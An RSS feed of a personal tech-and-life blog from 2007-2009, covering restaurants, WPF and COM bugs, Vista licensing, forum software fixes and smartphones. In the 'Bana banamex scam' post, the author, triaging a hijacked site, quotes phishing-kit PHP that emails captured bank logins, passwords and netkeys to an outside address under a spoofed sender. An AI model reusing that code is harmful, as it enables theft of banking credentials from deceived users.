<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0">
   <channel>
      <title>Tim&apos;s Journal</title>
      <link>http://torque.gig8.com/</link>
      <description>Figuring out the world... one day at a time.</description>
      <language>en</language>
      <copyright>Copyright 2009</copyright>
      <lastBuildDate>Fri, 16 Jan 2009 12:20:30 -0800</lastBuildDate>
      <generator>http://www.sixapart.com/movabletype/</generator>
      <docs>http://blogs.law.harvard.edu/tech/rss</docs> 

            <item>
         <title>Andale in Palo Alto is closing...</title>
         <description><![CDATA[<p>I had a scrumptious Baja Fish burrito at <a href="http://www.andalemexican.com/">Andale</a> in Palo Alto... and it may be the last one I ever have.  As my friend approached the counter and presented his stamp card, the lady at the counter muttered, "we'll be closed on Sunday". </p><p>"Oh, you mean, you'll be closed on Sundays from now on?"</p><p>"No, we will be closed on Sunday."</p><p>Sign of the times...</p>]]></description>
         <link>http://torque.gig8.com/2009/01/andale_in_palo_alto_is_closing.html</link>
         <guid>http://torque.gig8.com/2009/01/andale_in_palo_alto_is_closing.html</guid>
                  <category domain="http://www.sixapart.com/ns/types#category">Food</category>
        
        
         <pubDate>Fri, 16 Jan 2009 12:20:30 -0800</pubDate>
      </item>
            <item>
         <title>&quot;Image format is unrecognized&quot; when setting WPF Window Icon</title>
         <description><![CDATA[<p>Vista allows embedding 256x256 png images inside of .ico files.  This can be generated, for example, by an application such as IcoFX.  Unfortunately, at least as of .NET 3.0, the WPF Window Icon cannot accept this.  The problem does not lie in the IconBitmapDecoder, but appears to lie in the Window code.  To set the Icon property in code, we can do the following:<blockquote><pre>IconBitmapDecoder ibd = new IconBitmapDecoder(s, BitmapCreateOptions.None, BitmapCacheOption.Default);
this.Icon = ibd.Frames[0];</pre></blockquote></p><p>Where "s" is your .ico stream.  If you have a Vista-style .ico file, setting Icon will trigger the "image format is unrecognized" error.  The only way to resolve this is to generate the .ico <i>without</i> the Vista images*.</p><p><img alt="donotcompress.png" src="http://torque.gig8.com/donotcompress.png" width="420" height="403" /></p><p></p><p>Now, take a cleansing breath, smile, and get back to work.</p>
<p>*<a href="http://social.msdn.microsoft.com/Forums/en-US/wpf/thread/9e723d51-0e26-4609-8fe1-5e0edcf7385b/">MSDN discussion.</a></p>]]></description>
         <link>http://torque.gig8.com/2009/01/image_format_is_unrecognized_w.html</link>
         <guid>http://torque.gig8.com/2009/01/image_format_is_unrecognized_w.html</guid>
                  <category domain="http://www.sixapart.com/ns/types#category">C#</category>
        
        
         <pubDate>Fri, 16 Jan 2009 11:58:24 -0800</pubDate>
      </item>
            <item>
         <title>John Piper&apos;s Candidating Sermon at Bethlehem Baptist</title>
         <description><![CDATA[<p>I am increasingly becoming a fan of John Piper's ministry.  In general, I tend to shy away from Christian "pop stars" though I've found Piper's candid yet personal presentation of scripture to be first-rate.  One of the most interesting aspects of his organization is that literally hundreds of sermons (audio/video/text) are available gratuit from the Desiring God website dating back to 1980.  It makes for a good study of both the man and the ministry.  Amazingly, they even have his candidating sermon.  Impressive.</p>
<p>
<a href="http://www.desiringgod.org/ResourceLibrary/Sermons/ByDate/1980/1823_John_Pipers_Candidating_Sermon_at_Bethlehem_Baptist/">
John Piper's Candidating Sermon at Bethlehem Baptist</a>
<a href="http://www.biblegateway.com/passage/?search=Philippians%201:19–26&version=47;">Philippians 1:19-26</a></p>]]></description>
         <link>http://torque.gig8.com/2008/08/john_pipers_candidating_sermon_1.html</link>
         <guid>http://torque.gig8.com/2008/08/john_pipers_candidating_sermon_1.html</guid>
                  <category domain="http://www.sixapart.com/ns/types#category">Piper</category>
        
                  <category domain="http://www.sixapart.com/ns/types#tag">bethlehem baptist. pastoral ministry</category>
                  <category domain="http://www.sixapart.com/ns/types#tag">piper</category>
                  <category domain="http://www.sixapart.com/ns/types#tag">sermon</category>
        
         <pubDate>Thu, 07 Aug 2008 09:24:50 -0800</pubDate>
      </item>
            <item>
         <title>DisconnectedContext was detected</title>
         <description><![CDATA[<blockquote>Context 0x1fa878 is disconnected.  No proxy will be used to service the request on the COM component. This may cause corruption or data loss. To avoid this problem, please ensure that all contexts/apartments stay alive until the application is completely done with the RuntimeCallableWrappers that represent COM</blockquote>
Wow, look at that jargon.  Anglais, si'l vous plait.  My humble attempt, can you do better?<blockquote>Dude, remember when I told you that running multiple chunks of code in parallel, i.e., multi-threading, was <a href="http://badtux.org/home/eric/editorial/threads.php">evil</a>?  Remember how you didn't listen to me?  Well, I noticed that you are manipulating some stuff from chunk one in chunk two.  What are you going to do if chunk one suddenly ends and the stuff disappears?</blockquote>]]></description>
         <link>http://torque.gig8.com/2007/11/disconnectedcontext_was_detected.html</link>
         <guid>http://torque.gig8.com/2007/11/disconnectedcontext_was_detected.html</guid>
                  <category domain="http://www.sixapart.com/ns/types#category">C#</category>
        
                  <category domain="http://www.sixapart.com/ns/types#tag">bugs</category>
                  <category domain="http://www.sixapart.com/ns/types#tag">c#</category>
                  <category domain="http://www.sixapart.com/ns/types#tag">context</category>
                  <category domain="http://www.sixapart.com/ns/types#tag">debugger</category>
                  <category domain="http://www.sixapart.com/ns/types#tag">disconnectedcontext</category>
        
         <pubDate>Wed, 28 Nov 2007 00:55:46 -0800</pubDate>
      </item>
            <item>
         <title>Dojo 1.0.0 available on AOL CDN</title>
         <description><![CDATA[<strong>Background.</strong> <a href="http://dojotoolkit.org">Dojo</a> is a toolkit of javascript functions which speeds up web development.  It includes both aesthetic and technically-helpful elements.  Prior to AOL hosting the toolkit, it would be necessary to physically transfer the compressed files to the server and uncompress.  While this was a cinch on my lunarpages-hosted linux account running CPanel, it turned out to be quite a pain with a windows-based account running Plesk.

To use:<blockquote>&lt;script type="text/javascript" src=<a href="http://o.aolcdn.com/dojo/1.0.0/dojo/dojo.xd.js">"http://o.aolcdn.com/dojo/1.0.0/dojo/dojo.xd.js"</a>&gt;&lt;/script&gt;</blockquote>Very handy.  Thank you AOL.

Source: http://dojotoolkit.org/2007/11/06/dojo-1-0-0-available-aol-cdn]]></description>
         <link>http://torque.gig8.com/2007/11/dojo_100_available_on_aol_cdn.html</link>
         <guid>http://torque.gig8.com/2007/11/dojo_100_available_on_aol_cdn.html</guid>
        
                  <category domain="http://www.sixapart.com/ns/types#tag">aol</category>
                  <category domain="http://www.sixapart.com/ns/types#tag">compressed</category>
                  <category domain="http://www.sixapart.com/ns/types#tag">cpanel</category>
                  <category domain="http://www.sixapart.com/ns/types#tag">dojo</category>
                  <category domain="http://www.sixapart.com/ns/types#tag">dojo tookit</category>
                  <category domain="http://www.sixapart.com/ns/types#tag">gunzip</category>
                  <category domain="http://www.sixapart.com/ns/types#tag">javascript</category>
                  <category domain="http://www.sixapart.com/ns/types#tag">lunarpages</category>
                  <category domain="http://www.sixapart.com/ns/types#tag">plesk</category>
                  <category domain="http://www.sixapart.com/ns/types#tag">unzip</category>
        
         <pubDate>Fri, 16 Nov 2007 11:27:17 -0800</pubDate>
      </item>
            <item>
         <title>The fine print on Vista</title>
         <description><![CDATA[I recently had a chance to skim through the Vista Enterprise software license.  Microsoft is currently <a href="http://www.microsoft.com/downloads/details.aspx?FamilyID=c2c27337-d4d1-4b9b-926d-86493c7da1aa&displaylang=en">offering Vista as a 30-day VHD</a> (Virtual Hard Drive; requires registration) ostensibly for IT-departments paralyzed by the potential of all mission critical software to sieze up on update.  It requires Microsoft <a href="http://www.microsoft.com/windowsserversystem/virtualserver/default.aspx">Virtual Server R2</a>, Microsoft's (free, sorry VMWare) virtualization solution.  If you are involved in potentially licensing software as a licensor or licensee, it's absolutely worth a gander.  I'm sure they spent a fortune with attorneys on drafting it.

Questions and observations:<ol><li><i>How do we handle licensing Vista virtualized across multiple machines?</i><ul><li>"A hardware partition or blade is considered a separate device." -- </li><li>"You may use the software on up to two processors on that device at one time."</li><li>"You may use the software installed on the licensed device within a virtual (or otherwise emulated) hardware system.  If you do so, you may not play or access content or use applications protected by any Microsoft digital, information or enterprise rights management technology or other Microsoft rights management services or use BitLocker."</li></ul></li><li><i>What is "<a href="http://en.wikipedia.org/wiki/Connection_pool">pooling</a>"?</i> <strong>Timesharing?</strong><ul><li>"Except as provided in the Device Connections and Other Access Technologies sections below, only one user may use the software at a time."</li><li>"Hardware or software you use to ·     pool connections, or ·     reduce the number of devices or users that directly access or use the software (sometimes referred to as “multiplexing” or “pooling”), does not reduce the number of licenses you need."</li></ul></li><li><i>Did I buy Vista?</i> <strong>Nope.</strong><ul><li>"The software is licensed, not sold. This agreement only gives you some rights to use the software.  Microsoft reserves all other rights."</li><li>"You may not... rent, lease or lend the software..."</li><li>"You may not... use the software for commercial software hosting services."</li></ul></li><li><i>Will I get support?</i> <strong>Don't count on it.</strong><ul><li>"Because the software is “as is,” we may not provide support services for it."</li><li>"The software is licensed “as-is.”  You bear the risk of using it.  Microsoft gives no express warranties, guarantees or conditions."</li><li>"To the extent permitted under your local laws, Microsoft excludes the implied warranties of merchantability, fitness for a particular purpose and non-infringement."</li></ul></li><li><i>What if something breaks, or I lose critical data?</i> <strong>Tough luck.</strong><ul><li>"You can recover from Microsoft and its suppliers only direct damages up to U.S. $5.00.  You cannot recover any other damages, including consequential, lost profits, special, indirect or incidental damages."</li><li> "It also applies even if Microsoft knew or should have known about the possibility of the damages."</li></ul></li></ol>]]></description>
         <link>http://torque.gig8.com/2007/11/the_fine_print_on_vista.html</link>
         <guid>http://torque.gig8.com/2007/11/the_fine_print_on_vista.html</guid>
                  <category domain="http://www.sixapart.com/ns/types#category">Licensing</category>
        
                  <category domain="http://www.sixapart.com/ns/types#tag">microsoft</category>
                  <category domain="http://www.sixapart.com/ns/types#tag">software licensing</category>
                  <category domain="http://www.sixapart.com/ns/types#tag">vhd</category>
                  <category domain="http://www.sixapart.com/ns/types#tag">virtual hard drive</category>
                  <category domain="http://www.sixapart.com/ns/types#tag">virtual server</category>
                  <category domain="http://www.sixapart.com/ns/types#tag">virtualization</category>
                  <category domain="http://www.sixapart.com/ns/types#tag">vista</category>
                  <category domain="http://www.sixapart.com/ns/types#tag">windows</category>
        
         <pubDate>Wed, 14 Nov 2007 09:33:01 -0800</pubDate>
      </item>
            <item>
         <title>Resolving the missing Ad Management link (SMF 1.1.3)</title>
         <description><![CDATA[<b>Symptom:</b> Installing Ad Management for SMF 1.1.3 from smfads.com indicates success.  No Ad Management link is present under Configuration tab.  However, inspection (view source) reveals an incomplete link, in my case to <blockquote><pre>index.php?action=admod</pre></blockquote>

with no parameters.  The incomplete link can be visually checked by noticing the extra space between Configuration and the next tab.

<b>Resolution:</b>  Per <a href="http://www.smfads.com/forums/index.php?topic=838.0">jerm</a>, the issue has to do with english versus english-utf8.  The current version "ad_mod_1-1-x_v2-3" creates a file called "Ads.english.php" in the languages folder of the default directory.  A quick glance at the 1.1.3 install (and probably a few subversions back) shows that a copy should probably be made for "Ads.english-utf8.php".  Create this copy by hand for quick resolution OR alternatively, installing using <a href="http://torque.gig8.com/ad_mod_1-1-x_v2-3x.zip">ad_mod_1-1-x_v2-3x</a> (simple hack to include utf8 copy).  The only real change to the package is the addition of Ads.english-utf8.php (copy), and adding the following line to package-info.xml to read:<blockquote><pre>require-file name="Ads.english-utf8.php" destination="$languagedir"</pre></blockquote>

Let me know if there are any issues or if you found the hack helpful.]]></description>
         <link>http://torque.gig8.com/2007/07/resolving_the_missing_ad_management_link_smf_113.html</link>
         <guid>http://torque.gig8.com/2007/07/resolving_the_missing_ad_management_link_smf_113.html</guid>
        
                  <category domain="http://www.sixapart.com/ns/types#tag">ad management</category>
                  <category domain="http://www.sixapart.com/ns/types#tag">adsense</category>
                  <category domain="http://www.sixapart.com/ns/types#tag">hacks</category>
                  <category domain="http://www.sixapart.com/ns/types#tag">smf</category>
                  <category domain="http://www.sixapart.com/ns/types#tag">troubleshooting</category>
        
         <pubDate>Fri, 13 Jul 2007 10:43:52 -0800</pubDate>
      </item>
            <item>
         <title>&quot;Bana&quot; banamex scam</title>
         <description><![CDATA[I recently went in and triaged a Geeklog install I haven't touched in a few months.  Lo and behold, it had been hijacked by scammer spammers.  Here is login.php:<blockquote>
$message .= "Login: ".$_POST['ncliente'];
$message .= "Password: ".$_POST['pass'];
$message .= "Netkey: ".$_POST['netkey'];          
$message .= $ip = getenv("REMOTE_ADDR");

//sending email info here

	$subj = "Bancanet - Banamex";
	$from = "From: Info<info@banamex.com>";
                mail("devilzx0@gmail.com", $subj, $message, $from);
                header("Location: verificacion.htm");</blockquote>

My ISP was complaining of mail sent.  This was probably it.    There are a lot of references in the index.htm and verificacion.html to banamex.com.  Check out this particular segment of verficacion.htm:<blockquote>file:///D:/Banking/Scams/Scam/Upload%20Scam/Upload%20Venezuela/Mis%20documentos/Mis%20archivos%20recibidos/letter_files/nuevobnp.css</blockquote>

How and where is the money made here?  Harvesting accidental logins... There is one redirection to "istemp.com":<blockquote>href="http://centralbanamex.com.istemp.com/banamex/"</blockquote>

Anyone know anything about this?

<b>Update:</b> Here's the <a href="http://www.websense.com/securitylabs/alerts/alert.php?AlertID=132">phishing alert</a>.  It's from 2005.]]></description>
         <link>http://torque.gig8.com/2007/07/bana_banamex_scam.html</link>
         <guid>http://torque.gig8.com/2007/07/bana_banamex_scam.html</guid>
                  <category domain="http://www.sixapart.com/ns/types#category">Scams</category>
        
                  <category domain="http://www.sixapart.com/ns/types#tag">bana</category>
                  <category domain="http://www.sixapart.com/ns/types#tag">banamex</category>
                  <category domain="http://www.sixapart.com/ns/types#tag">devilzx0</category>
                  <category domain="http://www.sixapart.com/ns/types#tag">istemp.com</category>
                  <category domain="http://www.sixapart.com/ns/types#tag">phishing</category>
                  <category domain="http://www.sixapart.com/ns/types#tag">scam</category>
                  <category domain="http://www.sixapart.com/ns/types#tag">spam</category>
        
         <pubDate>Tue, 10 Jul 2007 10:34:05 -0800</pubDate>
      </item>
            <item>
         <title>Be not anxious!</title>
         <description><![CDATA[Bonhoeffer writes:<blockquote>Be not anxious!  Earthly possessions dazzle our eyes and delude us into thinking that they can provide security and freedom from anxiety.  <u>Yet all the time they are the very source of all anxiety</u>.  If our hearts are set on them, our reward is an anxiety whose burden is intolerable.  Anxiety creates its own treasures and they in turn beget further care.  When we seek for security in possessions we are trying to drive out care with care, and the net result is the precise opposite of our anticipations.  The fetters which bind us to our possessions prove to be cares themselves. [emphasis mine]</blockquote>]]></description>
         <link>http://torque.gig8.com/2007/07/be_not_anxious.html</link>
         <guid>http://torque.gig8.com/2007/07/be_not_anxious.html</guid>
                  <category domain="http://www.sixapart.com/ns/types#category">Anti-anxiety</category>
        
                  <category domain="http://www.sixapart.com/ns/types#tag">anxiety</category>
                  <category domain="http://www.sixapart.com/ns/types#tag">bonhoeffer</category>
                  <category domain="http://www.sixapart.com/ns/types#tag">relaxing</category>
                  <category domain="http://www.sixapart.com/ns/types#tag">stress</category>
        
         <pubDate>Tue, 10 Jul 2007 09:41:21 -0800</pubDate>
      </item>
            <item>
         <title>Chimichanga de Manzana</title>
         <description>Spotted on the Guadalajara (Redding, CA) menu.  A flour tortilla filled with apples and deep fried.  Topped with sugar, cinnamon, honey and whipped cream.  Served with two scoops of vanilla or chocolate ice cream.  $5.25.  Mmmmmm.</description>
         <link>http://torque.gig8.com/2007/06/chimichanga_de_manzana.html</link>
         <guid>http://torque.gig8.com/2007/06/chimichanga_de_manzana.html</guid>
                  <category domain="http://www.sixapart.com/ns/types#category">Life</category>
        
                  <category domain="http://www.sixapart.com/ns/types#tag">dessert</category>
                  <category domain="http://www.sixapart.com/ns/types#tag">guadalajara</category>
                  <category domain="http://www.sixapart.com/ns/types#tag">health</category>
                  <category domain="http://www.sixapart.com/ns/types#tag">ice cream</category>
                  <category domain="http://www.sixapart.com/ns/types#tag">manzana</category>
                  <category domain="http://www.sixapart.com/ns/types#tag">redding</category>
        
         <pubDate>Wed, 20 Jun 2007 13:06:44 -0800</pubDate>
      </item>
            <item>
         <title>Printing with Google Spreadsheets</title>
         <description><![CDATA[<b>5:01 PM 6/19/2007</b>.  Printing does not work.  It flat out doesn't work.  Ok, ok, it works in a sense, stuff comes out of the printer, but columns are chopped and the chopped data doesn't even show up on future pages.  See <a href="http://torque.gig8.com/pdfs/spreadsheetprint022.pdf">scan</a>.  Now I will humbly copy my spreadsheet data to Microsoft Excel and print.  Mr. Gates, you may now say "I told you so."  (Of course, maybe this is G's way to wipe out all paper copies... but hey, I still don't have EDGE or EVDO in my car, and no, I shouldn't be looking at Google Docs with my one hand while driving...)

<b>5:10 PM 6/19/2007</b>.  Cutting and pasting into Excel from Google Spreadsheets does not work.  It flat out doesn't work.  The caveat here is that I have It doesn't work when you paste from the app, and it doesn't.  Here's the source:

<a href="http://torque.gig8.com/images/printing%20with%20google%20spreadsheet.html" onclick="window.open('http://torque.gig8.com/images/printing%20with%20google%20spreadsheet.html','popup','width=1052,height=816,scrollbars=no,resizable=no,toolbar=no,directories=no,location=no,menubar=no,status=no,left=0,top=0'); return false"><img src="http://torque.gig8.com/images/printing%20with%20google%20spreadsheet-thumb.PNG" width="300" height="232" alt="" /></a>

And the Excel paste:

<a href="http://torque.gig8.com/images/google%20spreadsheet%20to%20excel.html" onclick="window.open('http://torque.gig8.com/images/google%20spreadsheet%20to%20excel.html','popup','width=577,height=556,scrollbars=no,resizable=no,toolbar=no,directories=no,location=no,menubar=no,status=no,left=0,top=0'); return false"><img src="http://torque.gig8.com/images/google%20spreadsheet%20to%20excel-thumb.PNG" width="300" height="289" alt="" /></a>

Not cool.  You get somewhat better results by pressing Print in Google Spreadsheets, and copying and pasting from that.  However, the results are still rather lacking...

<a href="http://torque.gig8.com/images/google%20spreadsheet%20to%20excel%202.html" onclick="window.open('http://torque.gig8.com/images/google%20spreadsheet%20to%20excel%202.html','popup','width=645,height=618,scrollbars=no,resizable=no,toolbar=no,directories=no,location=no,menubar=no,status=no,left=0,top=0'); return false"><img src="http://torque.gig8.com/images/google%20spreadsheet%20to%20excel%202-thumb.PNG" width="300" height="287" alt="" /></a>

Sigh.  The problem here are all the carriage returns I have embedded in the cells.

<b>Update.</b>  The (lame) solution.  Wipe out middle column so I <i>know</i> there is enough paper space.  Print first page, establish what I need to re-size the last column to.  Re-size and re-print.]]></description>
         <link>http://torque.gig8.com/2007/06/printing_with_google_spreadshe.html</link>
         <guid>http://torque.gig8.com/2007/06/printing_with_google_spreadshe.html</guid>
                  <category domain="http://www.sixapart.com/ns/types#category">Groupware</category>
        
                  <category domain="http://www.sixapart.com/ns/types#tag">copying and pasting</category>
                  <category domain="http://www.sixapart.com/ns/types#tag">excel</category>
                  <category domain="http://www.sixapart.com/ns/types#tag">google spreadsheet</category>
                  <category domain="http://www.sixapart.com/ns/types#tag">printing</category>
        
         <pubDate>Tue, 19 Jun 2007 17:03:51 -0800</pubDate>
      </item>
            <item>
         <title>T-Mobile vs. Verizon vs. Sprint</title>
         <description><![CDATA[<b>a.k.a. EDGE vs. EVDO Rev 0 vs EDVO Rev A</b>

To think, the T-Mobile looked straight into my eyes and said that there wasn't much different in speeds between T-Mobile and other carriers.  I found some real numbers on <a href="http://www.swivel.com/graphs/spreadsheet/5122324">Richard's spreasheets on Swivel</a>.  His answer is resounding Sprint.  The test is not quite what I wanted, since it is access from his location to various Speakeasy speed test servers.  What I really want is a true test, using the speed test servers, from the various locations.  In any case, the SF download speeds for T-Mobile vs. Verizon vs. Sprint is 144:930:1,081, uploads are 9:114:512 kbps.  9?!?! 

<b>Update:</b> What we really want is a GPS-enabled phone (same phone) on all three carriers (four including Cingular), giving us location-based results for the different carriers.  THAT would be a very nice article and mashup project.]]></description>
         <link>http://torque.gig8.com/2007/06/tmobile_vs_verizon_vs_sprint.html</link>
         <guid>http://torque.gig8.com/2007/06/tmobile_vs_verizon_vs_sprint.html</guid>
                  <category domain="http://www.sixapart.com/ns/types#category">Smartphones</category>
        
                  <category domain="http://www.sixapart.com/ns/types#tag">download speed</category>
                  <category domain="http://www.sixapart.com/ns/types#tag">edge</category>
                  <category domain="http://www.sixapart.com/ns/types#tag">edvo</category>
                  <category domain="http://www.sixapart.com/ns/types#tag">sprint</category>
                  <category domain="http://www.sixapart.com/ns/types#tag">t-mobile</category>
                  <category domain="http://www.sixapart.com/ns/types#tag">upload speed</category>
                  <category domain="http://www.sixapart.com/ns/types#tag">verizon</category>
                  <category domain="http://www.sixapart.com/ns/types#tag">wireless broadband</category>
                  <category domain="http://www.sixapart.com/ns/types#tag">wireless carriers</category>
        
         <pubDate>Tue, 19 Jun 2007 16:52:51 -0800</pubDate>
      </item>
            <item>
         <title>&quot;Playin&apos;&quot; with the T-Mobile Wing and T-Mobile Dash</title>
         <description><![CDATA[I had a chance this afternoon to spend a half-hour or so with the T-Mobile Wing and Dash.  Both running Windows Mobile, the main attraction was a phone-based EDGE solution for my laptop.  Prognosis?  Pretty, reasonably functional, but <u>both require two-hand operation</u>.  My Blackberry's mostly one-handed operation turns out to be more valuable to me than I thought.

The Dash is unusual for a PDA-esque Windows device in that it does NOT have a touch screen.  While still useable, I found several moments in my trial having to hold back my fingers from the screen.  The Wing, on the other hand, DOES have a touchable screen, and comes with stylus operation.  Interestingly, I found myself using both hands to type, as well as using the stylus.  While in general I do not recommend using any kind of smart phone while operating a vehicle, I <b>really</b> don't recommend Wing usage at a stop light or in traffic.  I suppose this should have been expected given the full keyboard.

Size-wise the Wing is a bit on the fat size, but forgivable since it comes with a beautiful large screen and a reasonable camera (not a problem if you carry a purse or equivalent).  The Dash on the other hand, is just a bit thinner than my Blackberry.  Towards the end of my short session, I had to look something up on Google.  I tried it on the Dash, gave up.  Tried it on the Wing, gave up, and finally got it done on my Blackberry... with one hand.

So, there it is.  I was looking for a laptop-modemable Wifi, Edge-cable phone.  I found two, none of which I was ready to take in exchange for good ole' BB.

<b>Addendum:</b> The fact that I found myself using the stylus on the Wing and wanting to on the Dash says something.  I never need to worry about the screen on BB.  But then, it doesn't run PowerPoint.]]></description>
         <link>http://torque.gig8.com/2007/06/playin_with_the_tmobile_wing_a.html</link>
         <guid>http://torque.gig8.com/2007/06/playin_with_the_tmobile_wing_a.html</guid>
                  <category domain="http://www.sixapart.com/ns/types#category">Smartphones</category>
        
                  <category domain="http://www.sixapart.com/ns/types#tag">blackberry</category>
                  <category domain="http://www.sixapart.com/ns/types#tag">edge</category>
                  <category domain="http://www.sixapart.com/ns/types#tag">mda</category>
                  <category domain="http://www.sixapart.com/ns/types#tag">smartphone</category>
                  <category domain="http://www.sixapart.com/ns/types#tag">t-mobile</category>
                  <category domain="http://www.sixapart.com/ns/types#tag">t-mobile dash</category>
                  <category domain="http://www.sixapart.com/ns/types#tag">t-mobile wing</category>
                  <category domain="http://www.sixapart.com/ns/types#tag">tmobile dash</category>
                  <category domain="http://www.sixapart.com/ns/types#tag">tmobile wing</category>
                  <category domain="http://www.sixapart.com/ns/types#tag">wifi</category>
        
         <pubDate>Tue, 19 Jun 2007 16:28:50 -0800</pubDate>
      </item>
            <item>
         <title>Your personal crash test dummy...</title>
         <description><![CDATA[ConsumerReports has <a href="http://www.consumerreports.org/cro/cars/safety-recalls/carcrashtest/crashtestvideo.htm">crash test videos</a> for 150+ vehicles.  It's rather unsettling, and a good reminder that driving is no walk-in-the-park.  The slow motion is especially revealing.  Choose some pricy cars.  Note to self: new Volkswagen Beetle -- poor side impact results, yikes.]]></description>
         <link>http://torque.gig8.com/2007/06/your_personal_crash_test_dummy.html</link>
         <guid>http://torque.gig8.com/2007/06/your_personal_crash_test_dummy.html</guid>
                  <category domain="http://www.sixapart.com/ns/types#category">Driving</category>
        
                  <category domain="http://www.sixapart.com/ns/types#tag">crash test</category>
                  <category domain="http://www.sixapart.com/ns/types#tag">dummies</category>
                  <category domain="http://www.sixapart.com/ns/types#tag">safety</category>
                  <category domain="http://www.sixapart.com/ns/types#tag">vehicles</category>
        
         <pubDate>Sat, 16 Jun 2007 01:31:53 -0800</pubDate>
      </item>
            <item>
         <title>Paul Potts chronology</title>
         <description><![CDATA[Paul Potts (not to be confused with Paul Pott) has got talent, there is no question about that.  The Sun, bastion of journalism, has <a href="http://www.thesun.co.uk/article/0,,2001320029-2007270918,00.html">a piece</a> on readers furious with the revelation that the "unassuming mobile phone salesman" had been coached by Luciano Pavarotti.  The Sun claims that Mr. Potts<ul><li>has received extensive training</li><li>was a regular at <a href="http://www.bathopera.co.uk/Past%20Productions/Don%20Carlos/don_carlos_biographies.htm">Bath Opera</a>, including being a lead in Verdi Don Carlos</li><li>spent two summers touring northern Italy with a major opera school, taking master classes with top stars, including Mr. Pavarotti</li><li>won £8,000 in 1999 on a TV talent show</li></ul>

Says Mr. Potts, "I am not a professional. I’ve never been paid for my singing, all the training I’ve received I paid for myself, and I grafted hard to do so."  That's believable, you would have expected this if he was serious.  Of course, the bonus points are much less than if you had done all your training in front of a karoke box...

Mr. Potts' Bath Opera bio doesn't elicit too much sympathy, though this is not unexpected, since one would expect the opera to market experience, rather than inexperience.<blockquote>Paul Potts (Don Carlos) is a relative new comer to Grand Opera after an apprenticeship in Gilbert and Sullivan in Bristol.. His claim to fame is his 1999 appearance on Michael Barrymore's My Kind of Music. This was followed by singing for Bath Opera in Turandot as Prince of Persia and Herald. He has since performed with The Royal Philharmonic Orchestra and spent three months touring Northern Italy as a soloist, training under top teachers Mario Melani and Svetlana Sidrova. He has been invited back for a concert to be recorded and also for a masterclass with Luciano Pavarotti. Future plans include a summer tour with the RPO.</blockquote>

Wikipedia has <a href="http://en.wikipedia.org/wiki/Paul_Potts">a bit more</a>.  You can also visit his MySpace page for <a href="http://www.myspace.com/paul_potts">more personal content</a>.  Modern technology... wow.

]]></description>
         <link>http://torque.gig8.com/2007/06/paul_potts_chronology.html</link>
         <guid>http://torque.gig8.com/2007/06/paul_potts_chronology.html</guid>
                  <category domain="http://www.sixapart.com/ns/types#category">Music</category>
        
                  <category domain="http://www.sixapart.com/ns/types#tag">britain&apos;s got talent</category>
                  <category domain="http://www.sixapart.com/ns/types#tag">music</category>
                  <category domain="http://www.sixapart.com/ns/types#tag">opera</category>
                  <category domain="http://www.sixapart.com/ns/types#tag">paul pott</category>
        
         <pubDate>Sat, 16 Jun 2007 00:49:42 -0800</pubDate>
      </item>
      
   </channel>
</rss>
